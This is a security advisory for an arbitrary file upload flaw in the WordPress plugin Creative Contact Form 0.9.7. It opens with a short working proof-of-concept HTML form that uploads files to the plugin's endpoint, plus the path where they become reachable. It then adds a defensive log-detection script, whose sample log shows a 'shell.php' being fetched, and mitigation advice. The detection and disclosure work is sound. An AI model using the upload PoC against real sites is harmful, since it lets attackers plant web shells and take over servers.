
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload


## PoC
Trigger a file upload

```html
<form method="POST" action="http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php" enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
```

Then the file is accessible under
http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/FILENAME
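The PoC above leaves a distinctive trace in a web server's access log: a POST to the plugin's `fileupload/index.php` followed by a GET of a server-side-executable file under `fileupload/files/`. The following detection script is an added example for defenders and is not part of the original advisory. It assumes Apache/nginx combined log format; the log lines, client addresses and file names in it are constructed for illustration.

```python
"""Flag upload-then-fetch sequences against the Creative Contact Form
fileupload endpoint in combined-format access logs (added defender example)."""
import re

UPLOAD_ENDPOINT = "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
UPLOAD_DIR = "/wp-content/plugins/sexy-contact-form/includes/fileupload/files/"

# Extensions the web server would typically execute if served from the plugin directory
EXECUTABLE_EXT = (".php", ".phtml", ".php5", ".phar")

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log: one benign upload flow and one that fetches a .php file back
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2014:13:55:36 +0000] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2014:13:55:40 +0000] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 87 "-" "python-requests/2.4"
203.0.113.7 - - [10/Oct/2014:13:55:41 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php HTTP/1.1" 200 512 "-" "python-requests/2.4"
198.51.100.2 - - [10/Oct/2014:14:01:02 +0000] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2014:14:01:05 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/resume.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return one finding per (ip, path) where a client POSTed to the upload
    endpoint and later fetched an executable-looking file from the upload dir."""
    posted = set()      # client IPs that have hit the upload endpoint so far
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # drop any query string before matching
        if rec["method"] == "POST" and path == UPLOAD_ENDPOINT:
            posted.add(rec["ip"])
        elif (rec["method"] == "GET" and path.startswith(UPLOAD_DIR)
              and rec["ip"] in posted and path.lower().endswith(EXECUTABLE_EXT)):
            findings.append({"ip": rec["ip"], "path": path, "time": rec["time"]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} fetched uploaded executable {f['path']}")
```

On the sample log this reports only the 203.0.113.7 sequence, since the second client retrieves a `.pdf`. The rule is deliberately narrow (same client, executable extension); a broader hunt would also alert on any POST to the endpoint at all, and the durable fix is to remove or update the plugin and deny script execution in the `files/` directory at the web server.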